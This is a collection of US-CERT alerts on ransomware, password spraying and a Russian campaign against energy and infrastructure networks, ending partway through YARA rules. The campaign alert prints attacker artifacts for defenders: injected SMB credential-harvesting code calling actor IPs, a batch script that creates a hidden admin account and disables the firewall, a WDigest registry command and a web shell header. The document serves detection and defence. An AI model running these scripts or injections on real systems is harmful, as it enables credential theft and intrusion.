    Original release date: April 09, 2018NCCIC has observed an increase in ransomware attacks across the world. Ransomware is a type of malicious software, or malware, designed to deny access to a computer system or data until a ransom is paid. Ransomware typically spreads through phishing emails or by unknowingly visiting an infected website.Ransomware can be devastating to an individual or an organization. Anyone with important data stored on their computer or network is at risk, including government or law enforcement agencies and healthcare systems or other critical infrastructure entities. Throughout different ransomware events, NCCIC's best practices and guidance remain the same:create system back-upsbe wary of opening emails and attachments from unknown or unverified sendersensure that systems are updated with the latest patchesNCCIC encourages users and administrators to review its Ransomware page and the U.S. Government Interagency Joint Guidance for further information. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA18-086A: Brute Force Attacks Conducted by Cyber Actors
    by US-CERT on 27 marzo 2018 at 10:00 pm

    Original release date: March 27, 2018 | Last revised: March 28, 2018Systems Affected Networked systems Overview According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.On February 2018, the Department of Justice in the Southern District of New York, indicted nine Iranian nationals, who were associated with the Mabna Institute, for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity. Description In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.Technical DetailsTraditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password sprayUsing easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication methodLeveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accountsUsing the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZillaIndicators of a password spray attack include:A massive spike in attempted logons against the enterprise SSO portal or web-based application;Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).Attacks have been seen to run for over two hours.Employee logons from IP addresses resolving to locations inconsistent with their normal locations.Typical Victim EnvironmentThe vast majority of known password spray victims share some of the following characteristics [1][2]:Use SSO or web-based applications with federated authentication methodLack multifactor authentication (MFA)Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)Use inbox synchronization, allowing email to be pulled from cloud environments to remote devicesAllow email forwarding to be setup at the user levelLimited logging setup creating difficulty during post-event investigationsImpact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:Temporary or permanent loss of sensitive or proprietary information;Disruption to regular operations;Financial losses incurred to restore systems and files; andPotential harm to an organization’s reputation.Solution Recommended MitigationsTo help deter this style of attack, the following steps should be taken:Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols.Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.Many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]Reporting NoticeThe FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI’s 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at www.fbi.gov/contact-us/field. CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at CyWatch@ic.fbi.gov. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI’s national Press Office at npo@ic.fbi.gov or (202) 324-3691. References [1] NCCIC/US-CERT Tip ST04-002 – Choosing and Protecting Passwords [2] NCCIC/US-CERT Tip ST05-12 – Supplementing Passwords [3] NIST Special Publication 800-63 – Digital Identity Guidelines [4] Microsoft. Azure AD and ADFS best practices: Defending against password spray attacks Revision History March 27, 2018: Initial Version This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors
    by US-CERT on 15 marzo 2018 at 1:40 pm

    Original release date: March 15, 2018 | Last revised: March 16, 2018Systems Affected Domain ControllersFile ServersEmail ServersOverview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).For a downloadable copy of IOC packages and associated files, see:TA18-074A_TLP_WHITE.csvTA18-074A_TLP_WHITE.stix.xmlMIFR-10127623_TLP_WHITE.pdfMIFR-10127623_TLP_WHITE_stix.xmlMIFR-10128327_TLP_WHITE.pdfMIFR-10128327_TLP_WHITE_stix.xmlMIFR-10128336_TLP_WHITE.pdfMIFR-10128336_TLP_WHITE_stix.xmlMIFR-10128830­_TLP_WHITE.pdfMIFR-10128830­_TLP_WHITE_stix.xmlMIFR-10128883_TLP_WHITE.pdfMIFR-10128883_TLP_WHITE_stix.xmlMIFR-10135300_TLP_WHITE.pdfMIFR-10135300_TLP_WHITE_stix.xmlContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance. Description Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”Technical DetailsThe threat actors in this campaign employed a variety of TTPs, includingspear-phishing emails (from compromised legitimate account),watering-hole domains,credential gathering,open-source and network reconnaissance,host-based exploitation, andtargeting industrial control system (ICS) infrastructure.Using Cyber Kill Chain for AnalysisDHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework. Stage 1: ReconnaissanceThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections. Stage 2: WeaponizationSpear-Phishing Email TTPs Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2] Use of Watering Hole Domains One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic. <img src="https://www.us-cert.govfile[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" /> In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below: var i = document.createElement("img");i.src = "file[:]//184.154.150[.]66/ame_icon.png";i.width = 3;i.height=2;  Stage 3: Delivery When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment. Stage 4: Exploitation The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] Stage 5: Installation The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets. Establishing Local Accounts The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”. Contents of symantec_help.jsp ____________________________________________________________________________________________________________________<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>____________________________________________________________________________________________________________________The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English. Contents of enu.cmd ____________________________________________________________________________________________________________________netsh firewall set opmode disablenetsh advfirewall set allprofiles state offreg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /fnet user MS_BACKUP <Redacted_Password> /addnet localgroup Administrators /add MS_BACKUPnet localgroup Administradores /add MS_BACKUPnet localgroup Amministratori /add MS_BACKUPnet localgroup Administratoren /add MS_BACKUPnet localgroup Administrateurs /add MS_BACKUPnet localgroup "Remote Desktop Users" /add MS_BACKUPnet user MS_BACKUP /expires:neverreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /freg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /freg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fsc config termservice start= autonet start termservice____________________________________________________________________________________________________________________DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks. Scheduled TaskIn addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours. VPN SoftwareAfter achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks. Password Cracking ToolsConsistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\. Downloader Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.The files were renamed to new extensions, with INST.txt being renamed INST.exe.The files were executed on the host and then immediately deleted.The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key. Persistence Through .LNK File ManipulationThe threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:Parsed output for file: desktop.ini.lnkRegistry Modification The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command. reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f Stage 6: Command and ControlThe threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The difference between the two groups was the “public string Password” field. Beginning Contents of the Web Shell ____________________________________________________________________________________________________________________<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System"%><%@ import Namespace="System.IO"%><%@ import Namespace="System.Diagnostics"%><%@ import Namespace="System.Data"%><%@ import Namespace="System.Management"%><%@ import Namespace="System.Data.OleDb"%><%@ import Namespace="Microsoft.Win32"%><%@ import Namespace="System.Net.Sockets" %><%@ import Namespace="System.Net" %><%@ import Namespace="System.Runtime.InteropServices"%><%@ import Namespace="System.DirectoryServices"%><%@ import Namespace="System.ServiceProcess"%><%@ import Namespace="System.Text.RegularExpressions"%><%@ Import Namespace="System.Threading"%><%@ Import Namespace="System.Data.SqlClient"%><%@ import Namespace="Microsoft.VisualBasic"%><%@ Import Namespace="System.IO.Compression" %><%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><script runat = "server">public string Password = "<REDACTED>";public string z_progname = "z_WebShell";…____________________________________________________________________________________________________________________ Stage 7: Actions on Objectives DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets. Internal Reconnaissance Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:admins.txtcompleted_dclist.txtcompleted_trusts.txtcompleted_zone.txtcomps.txtconditional_forwarders.txtdomain_zone.txtenum_zones.txtusers.txtThe threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip”.The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.The directory “out” is created in the user’s %AppData% folder.PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.In one instance, DHS observed an “out.zip” file created.DHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network. Using <Username> <Password>Running -s cmd /c query user on <Hostname1>Running -s cmd /c query user on <Hostname2>Running -s cmd /c query user on <Hostname3>USERNAME     SESSIONNAME       ID    STATE    IDLE TIME      LOGON TIME<user1>                                              2       Disc       1+19:34         6/27/2017 12:35 PM An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names wereChromex64,Microsoft_Corporation,NT,Office365,Temp, andUpdate. Targeting of ICS and SCADA InfrastructureIn multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed. Cleanup and Cover Tracks In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.Threat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any tools they brought into the environment such as “scr.exe”. Detection and ResponseIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors. Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains. Network Signaturesalert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)___________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)__________________________________________alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;) YARA RulesThis is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.*/ rule APT_malware_1{meta:            description = "inveigh pen testing tools & related artifacts"            author = "DHS | NCCIC Code Analysis Team"                date = "2017/07/17"            hash0 = "61C909D2F625223DB2FB858BBDF42A76"            hash1 = "A07AA521E7CAFB360294E56969EDA5D6"            hash2 = "BA756DD64C1147515BA2298B6A760260"            hash3 = "8943E71A8C73B5E343AA9D2E19002373"            hash4 = "04738CA02F59A5CD394998A99FCD9613"            hash5 = "038A97B4E2F37F34B255F0643E49FC9D"            hash6 = "65A1A73253F04354886F375B59550B46"            hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"            hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"            hash9 = "722154A36F32BA10E98020A8AD758A7A"            hash10 = "4595DBE00A538DF127E0079294C87DA0"strings:            $s0 = "file://"            $s1 = "/ame_icon.png"            $s2 = "184.154.150.66"            $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }            $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"            $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"            $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="            $s8 = "NlZzSZk="            $s9 = "WlJTb1q5kaxqZaRnser3sw=="            $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"            $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"            $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"            $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }            $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }//inveigh pentesting tools            $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }//specific malicious word document PK archive            $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }            $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }            $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }            $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }            $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }            $s22 = "5.153.58.45"            $s23 = "62.8.193.206"            $s24 = "/1/ree_stat/p"            $s25 = "/icon.png"            $s26 = "/pshare1/icon"            $s27 = "/notepad.png"            $s28 = "/pic.png"            $s29 = "http://bit.ly/2m0x8IH"           condition:            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) 